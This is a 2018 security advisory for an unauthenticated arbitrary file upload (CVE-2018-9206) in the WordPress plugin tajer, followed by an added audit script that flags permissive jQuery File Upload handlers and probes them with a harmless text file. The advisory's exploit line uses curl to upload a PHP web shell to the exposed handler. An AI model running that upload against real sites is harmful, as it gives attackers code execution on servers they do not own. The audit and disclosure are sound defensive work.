| Title: Arbitrary file upload vulnerability in WordPress Plugin tajer v1.05 |
| Author: Larry W. Cashdollar, @_larry0 |
| Date: 2018-10-15 |
| CVE IDs:[CVE-2018-9206] |
| Download Site: https://wordpress.org/plugins/tajer |
| Vendor: |
| Vendor Notified: 0000-00-00 |
| Vendor Contact: |
| Advisory: http://www.vapidlabs.com/advisory.php?v=205 |
| Description: Tajer – All In One eCommerce WordPress Premium Class Plugin. You can sell any kind of digital goods: downloads, articles, a piece of content or any kind of content or virtual products. |
| Vulnerability: This plugin bundles a copy of Blueimp's jQuery File Upload under lib/jQuery-File-Upload-master/. The bundled PHP example handler (server/php/index.php) is reachable without authentication and, as shipped, accepts any file type, so an unauthenticated attacker can upload a PHP file into the web-accessible server/php/files/ directory and then request it to execute code on the server. CVE-2018-9206 is the upstream Blueimp issue; tajer is affected because it ships the vulnerable copy. |
| Exploit Code: curl -F "files=@shell.php" http://192.168.0.47/wp-content/plugins/tajer/lib/jQuery-File-Upload-master/server/php/index.php (the handler writes the upload to the files/ directory beside index.php, so the file is then served from .../server/php/files/shell.php) |
| Screen Shots: |
| Notes: |
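The following is an added example, not part of this advisory or of the tajer plugin: a POSIX shell script that audits a WordPress tree for bundled jQuery File Upload handlers still carrying the permissive upstream default accept_file_types ('/.+$/i'), plus a probe function that checks a handler URL with a harmless text file instead of a PHP shell. The sample plugin tree, plugin names and file contents are constructed for the demo; the default and restricted patterns are the ones from Blueimp's UploadHandler.php before and after the v9.22.1 fix.

```shell
#!/bin/sh
# Added example, not part of the vapidlabs advisory or the tajer plugin:
# (1) audit a WordPress tree for bundled copies of Blueimp jQuery File Upload
#     whose PHP handler still ships the permissive default accept_file_types,
# (2) optionally probe a live handler URL with a harmless .txt file.
# Plugin names, paths and the sample tree below are constructed for the demo.

# Print every UploadHandler.php under $1 whose accept_file_types is the
# upstream default '/.+$/i' (every file name accepted), one path per line.
audit_jfu_handlers() {
    find "$1" -type f -name 'UploadHandler.php' 2>/dev/null | sort |
    while read -r jfu_file; do
        if grep -Eq "accept_file_types'[[:space:]]*=>[[:space:]]*'/\.\+\\$/i'" "$jfu_file"; then
            printf '%s\n' "$jfu_file"
        fi
    done
}

# Number of permissive handlers under $1 (handy for scripting).
count_vulnerable_handlers() {
    audit_jfu_handlers "$1" | wc -l | tr -d ' '
}

# Build a constructed sample plugin tree under $1: one plugin bundling the
# unpatched handler, one bundling a handler with the upstream fix applied.
make_sample_tree() {
    sample_root="$1/wp-content/plugins"
    vuln_dir="$sample_root/example-vuln-plugin/lib/jQuery-File-Upload-master/server/php"
    fixed_dir="$sample_root/example-fixed-plugin/lib/jQuery-File-Upload/server/php"
    mkdir -p "$vuln_dir" "$fixed_dir"
    # Stand-in for the <= 9.22.0 default: any extension, .php included.
    cat > "$vuln_dir/UploadHandler.php" <<'EOF'
<?php
class UploadHandler {
    protected $options = array(
        'accept_file_types' => '/.+$/i',
    );
}
EOF
    # Stand-in for the 9.22.1 fix: image extensions only.
    cat > "$fixed_dir/UploadHandler.php" <<'EOF'
<?php
class UploadHandler {
    protected $options = array(
        'accept_file_types' => '/\.(gif|jpe?g|png)$/i',
    );
}
EOF
}

# Upload a benign text file to a jQuery File Upload handler URL (the
# .../server/php/index.php path from the advisory) and report whether the
# handler stored it. A text probe is enough to confirm the exposure; no PHP
# payload is sent. Only runs when a URL is supplied on the command line.
probe_upload() {
    probe_name="jfu-probe-$$.txt"
    probe_tmp=$(mktemp) || return 1
    printf 'jQuery-File-Upload exposure probe\n' > "$probe_tmp"
    probe_resp=$(curl -s -F "files=@$probe_tmp;filename=$probe_name" "$1")
    rm -f "$probe_tmp"
    # A stored upload is echoed back as {"files":[{"name":"<probe_name>",...}]}.
    if printf '%s\n' "$probe_resp" | grep -q "\"name\":\"$probe_name\""; then
        echo "VULNERABLE: $1 stored $probe_name (remove it: $(dirname "$1")/files/$probe_name)"
        return 0
    fi
    echo "not confirmed: $1 did not store $probe_name"
    return 1
}

# Demo on the constructed tree; pass a handler URL as $1 to run the live probe.
demo_root=$(mktemp -d)
make_sample_tree "$demo_root"
echo "permissive handlers under $demo_root:"
audit_jfu_handlers "$demo_root"
rm -rf "$demo_root"
if [ -n "${1:-}" ]; then
    probe_upload "$1"
fi
```

Run it with no arguments to see the audit against the constructed tree, or pass a handler URL such as the index.php path from the exploit line above to probe a live target, and delete the stored probe file afterwards. The file-name check is a heuristic: a plugin may rename the handler or override accept_file_types from its own code, so a clean audit is necessary, not sufficient; removing the bundled server/php/ directory outright is the safer fix where the plugin does not use it.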